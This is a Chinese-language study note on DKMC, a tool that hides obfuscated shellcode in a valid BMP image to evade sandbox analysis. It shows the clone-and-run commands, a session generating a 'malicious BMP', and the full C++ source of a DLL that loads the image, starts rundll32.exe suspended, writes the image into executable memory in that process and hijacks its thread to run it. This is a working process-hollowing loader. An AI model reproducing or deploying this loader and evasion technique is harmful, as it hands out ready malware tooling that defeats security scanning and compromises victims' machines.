【笔记】DKMC学习笔记

前言

Don’t kill my cat is a tool that generates obfuscated shellcode that is stored inside of polyglot images. The image is 100% valid and also 100% valid shellcode. The idea is to avoid sandbox analysis since it’s a simple “legit” image. For now the tool relies on PowerShell to execute the final shellcode payload. (GitHub)

下载项目

git clone https://github.com/Mr-Un1k0d3r/DKMC.git
cd DKMC

运行项目

python2 dkmc.py

生成包含ShellCode的bmp图片

DKMC - Don't kill my cat
Evasion tool - Mr.Un1k0d3r RingZer0 Team
|\ _,,,---,,_
/,`.-'`' -. ;-;;,_
|,4- ) )-,_..;\ ( `'-'
'---''(_/--' `-'\_) The sleepy cat

----------------------------------------------------
Select an option:

[*] (gen) Generate a malicious BMP image
[*] (web) Start a web server and deliver malicious image
[*] (ps) Generate Powershell payload
[*] (sc) Generate shellcode from raw file
[*] (exit) Quit the application

>>> gen

=================================================================================
| |
| Module to generate malicious Bitmap image with embedded obfuscation shellcode |
| |
=================================================================================


Allowed options:

[*] (show) Show module variables
[*] (set) Set value (set key value)
[*] (run) Run the module
[*] (exit) Go back to the main menu

Module Variables description:

debug Show debug output. More verbose
shellcode-path Path to a raw shellcode file
output Output file path
shellcode Shellcode payload using \x41\x41 format
source Image source file path


Current variable value:

debug = false
shellcode-path=
output = output/output-1727577750.bmp
shellcode =
source = sample/default.bmp

(generate)>>> set shellcode \x00\0x00\0x00\0x00
[+] shellcode value is set.

(generate)>>> run
[+] Image size is 300 x 275
[+] Generating obfuscation key 0x3d2d6fd1
[+] Shellcode size 0xfc (252) bytes
[+] Generating magic bytes 0xea275952
[+] Final shellcode length is 0x14f (335) bytes
[+] New BMP header set to 0x424de9acc50300
[+] New height is 0x0e010000 (270)
[+] Successfully save the image. (DKMC/output/output-1727577750.bmp)

(generate)>>>

C++的ShellCode执行器

#include "framework.h"
#include "windows.h"
#include "krpt.h"
#include <stdlib.h>
#include <stdio.h>


/*
 * DllMain: on DLL_PROCESS_ATTACH this sample reads a BMP file into memory and
 * runs its bytes as code inside a newly created rundll32.exe process by
 * pointing the new process's primary thread at the copied buffer. The Win32
 * flags are passed as raw numbers; their symbolic names are given in the
 * comments below for the reader's reference. Use of CONTEXT.Eip means this is
 * an x86 (32-bit) build. None of the C library or Win32 return values are
 * checked; the host process is terminated unconditionally at the end of the
 * attach path, so the function never returns on that path.
 */
BOOL APIENTRY DllMain(HMODULE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
{
FILE* fp;
size_t size;
unsigned char* buffer;
// "<file>.bmp" is a placeholder path. fp is not checked, so a missing
// file makes the fseek below operate on NULL (undefined behaviour / crash).
fp = fopen("<file>.bmp", "rb");
fseek(fp, 0, SEEK_END);
// ftell returns long (-1 on error); the unchecked conversion to size_t is
// what the allocation and copies below are sized by.
size = ftell(fp);
fseek(fp, 0, SEEK_SET);
buffer = (unsigned char*)malloc(size);
// Whole image read in one chunk; malloc/fread results are not checked.
fread(buffer, size, 1, fp);

// 0x3000 = MEM_COMMIT | MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE:
// a local RWX copy of the file contents. RWX private allocations are a
// well-known indicator that host-based monitoring keys on.
char* v7A = (char*)VirtualAlloc(0, size, 0x3000u, 0x40u);
memcpy((void*)v7A, buffer, size);

struct _PROCESS_INFORMATION ProcessInformation;
struct _STARTUPINFOA StartupInfo;
void* v24;
CONTEXT Context;
DWORD DwWrite = 0;
memset(&StartupInfo, 0, sizeof(StartupInfo));
// 68 is sizeof(STARTUPINFOA) on 32-bit Windows; hard-coded rather than
// taken from sizeof.
StartupInfo.cb = 68;
// 0x44 = CREATE_SUSPENDED | IDLE_PRIORITY_CLASS: rundll32.exe is started
// suspended so its own entry point never executes. A suspended child
// followed by remote writes and a thread-context change is the classic
// "process hollowing / thread hijack" telemetry pattern.
BOOL result = CreateProcessA(0, (LPSTR)"rundll32.exe", 0, 0, 0, 0x44u, 0, 0, &StartupInfo, &ProcessInformation);
if (result)
{
// 65539 = 0x10003 = CONTEXT_CONTROL | CONTEXT_INTEGER (x86).
Context.ContextFlags = 65539;
GetThreadContext(ProcessInformation.hThread, &Context);
// 0x1000 = MEM_COMMIT, 0x40 = PAGE_EXECUTE_READWRITE: RWX region in the
// child, same size as the image file.
v24 = VirtualAllocEx(ProcessInformation.hProcess, 0, size, 0x1000u, 0x40u);
WriteProcessMemory(ProcessInformation.hProcess, v24, v7A, size, &DwWrite);
// Primary thread resumes at the start of the copied image rather than at
// rundll32's entry point; the DKMC BMP header doubles as the first
// instructions.
Context.Eip = (DWORD)v24;
SetThreadContext(ProcessInformation.hThread, &Context);
ResumeThread(ProcessInformation.hThread);
CloseHandle(ProcessInformation.hThread);
result = CloseHandle(ProcessInformation.hProcess);
}


// The loading (host) process is killed here regardless of success, so
// fp/buffer are never released and the missing `break` after this block
// is never reached.
TerminateProcess(GetCurrentProcess(), 0);
}; // stray ';' is an empty statement
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}

完成